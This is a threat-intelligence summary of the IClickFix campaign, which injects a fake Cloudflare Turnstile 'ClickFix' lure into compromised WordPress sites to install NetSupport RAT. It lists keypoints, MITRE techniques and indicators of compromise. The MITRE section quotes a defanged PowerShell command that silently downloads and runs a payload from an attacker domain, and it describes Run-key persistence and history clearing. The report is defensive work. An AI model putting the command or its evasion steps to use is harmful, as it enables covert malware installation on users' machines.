Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic

IClickFix is a widespread malicious JavaScript framework that has been injected into over 3,800 compromised WordPress sites since at least December 2024 to display a fake Cloudflare Turnstile (ClickFix) lure and deliver downstream payloads. The framework uses a YOURLS-based Traffic Distribution System, multi-stage obfuscated JavaScript, and clipboard-based social engineering to install NetSupport RAT via a PowerShell dropper. #IClickFix #NetSupportRAT

Keypoints

IClickFix is a multi-stage malicious JavaScript framework injected into compromised WordPress sites that replaces legitimate pages with a fake Cloudflare Turnstile ClickFix lure to trick users into running commands.
The operator abuses YOURLS as a Traffic Distribution System (TDS) to filter visitors, evade bots/scanners, and redirect to staged JavaScript payloads.
ClickFix lures copy a malicious command to the victim’s clipboard that runs a PowerShell loader (SHA256: 05b03a25…) which drops NetSupport RAT components and establishes persistence via the Windows Run registry key.
NetSupport RAT deployment includes multiple component files (client32.exe, libraries, configuration and licence files) and hardcoded C2 gateways and endpoints (e.g., /fakeurl.htm) used for C2 communications.
Historical evolution: in early 2025 IClickFix distributed Emmenhtal Loader and XFiles Stealer; throughout 2025 the operator refined lures, added TDS protection, and expanded to thousands of WordPress sites.
Compromised sites span 82 countries and many industry verticals, indicating opportunistic mass exploitation rather than narrowly targeted operations.
Sekoia.io provides YARA rules to detect the ic-tracker-js tag, the obfuscated JavaScript stages, and the ClickFix lure HTML for detection and hunting.

MITRE Techniques

[T1189 ] Drive-by Compromise – IClickFix compromises legitimate WordPress sites and uses them as watering holes to serve malicious JavaScript and lure pages (‘a watering hole attack is a strategic attack where operators compromise a legitimate website known to be frequented by a specific target group, effectively ambushing users who visit the trusted source’).
[T1204 ] User Execution – The ClickFix lure instructs users to copy and execute a command to complete the fake verification, relying on social engineering to achieve execution (‘When the user attempts to resolve the challenge, he is instructed to copy and execute a specific command to complete the verification’).
[T1059.001 ] PowerShell – The ClickFix command executes a PowerShell command that downloads and runs an obfuscated PowerShell script used as a dropper (‘powershell -w hidden -nop -c “…;iwr ‘hxxs://scottvmorton[.]com/tytuy.json’ -OutFile $p;cmd /c start powershell -w hidden -ep Bypass -f $p”‘).
[T1105 ] Ingress Tool Transfer – The attack downloads remote payloads (PowerShell/JSON disguised files and JavaScript stages) from attacker-controlled URLs to the victim system (‘iwr ‘hxxs://scottvmorton[.]com/tytuy.json’ -OutFile $p’).
[T1071.001 ] Application Layer Protocol: Web Protocols – NetSupport RAT and other stages communicate with C2 servers over HTTP/S to endpoints such as /fakeurl.htm for command-and-control traffic (‘The malware communicates with its C2 servers on the endpoint /fakeurl.htm’).
[T1027 ] Obfuscated Files or Information – The JavaScript and PowerShell loader are obfuscated (base64 encoding, string slicing) to hinder analysis and detection (‘obfuscated via base64 encoding and string slicing’ and ‘obfuscated JavaScript file’).
[T1547.001 ] Registry Run Keys / Startup Folder – Persistence is achieved by creating a Run registry key that points to the NetSupport client executable (client32.exe) (‘Establish persistence via the Windows Run registry key, pointing to the executable client32.exe’).
[T1070.004 ] Indicator Removal on Host (Clear Command/History) – The PowerShell loader clears the RunMRU command history to remove traces of the ClickFix command before self-removal (‘Clear the RunMRU (most recently used) command history to remove traces of the ClickFix command, then self-remove’).
[T1041 ] Exfiltration Over C2 Channel – The first-stage JavaScript exfiltrates fingerprint and host data to a base64-encoded URL parameter pattern (.php?data=…) used by the framework’s infrastructure (‘Exfiltrates the fingerprint data, the compromised site’s domain and the timestamp, to a base64-encoded URL using the pattern:.php?data={“host”: ,”now”: }’).

Indicators of Compromise

[Domain ] IClickFix redirection / stage 1 domains – ksfldfklskdmbxcvb[.]com, qq525f.short[.]gy, and dozens of other redirection domains used in the YOURLS/TDS chain.
[Domain ] JavaScript hosting domains (stage 1) – ksdkgsdkgkgmgm[.]pro, bestieslos[.]com, and other domains hosting the obfuscated first-stage JavaScript.
[Domain ] Compromised WordPress sites hosting ClickFix lure (stage 2) – booksbypatriciaschultz[.]com, 1teamintl[.]com, and over 3,800 other infected WordPress domains serving the lure.
[Domain ] NetSupport RAT C2 domains – pusykakimao[.]com (gateway listed in client32.ini), fnotusykakimao[.]com (secondary gateway), and other C2 domains observed in the campaign.
[IP address ] NetSupport RAT C2 IPs and URLs – 85.208.84[.]35 (http://85.208.84[.]35:443/fakeurl.htm), 141.98.11[.]175 (http://141.98.11[.]175/fakeurl.htm), and other C2 IPs observed serving /fakeurl.htm.
[File Hash ] PowerShell loader SHA256 – 05b03a25e10535c5c8e2327ee800ff5894f5dbfaf72e3fdcd9901def6f072c6d (PowerShell dropper masquerading as SecureModule Engine v1.0.0).
[File Hash ] NetSupport component hashes – client32.exe SHA256: 06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268, AudioCapture.dll SHA256: 2cc8ebea55c06981625397b04575ed0eaad9bb9f9dc896355c011a62febe49b5, and other NetSupport component hashes (many more listed).
[Filename ] NetSupport RAT files dropped to disk – client32.exe, NSM.LIC, client32.ini, AudioCapture.dll, remcmdstub.exe, and numerous other NetSupport components written under ProgramDataS1kCMNfZi3.
[URL ] Malicious download and loader URLs – hxxps://scottvmorton[.]com/tytuy.json (PowerShell payload disguised as JSON), hxxps://ksfldfklskdmbxcvb[.]com/gigi?ts=… (injected script URL), and hxxps://ksdkgsdkgkgmgm[.]pro/ofofo.js (first-stage JS).
[HTML tag ] Distinctive injected tag used to find compromised pages – id=”ic-tracker-js” (used in YARA detection to identify infected WordPress pages).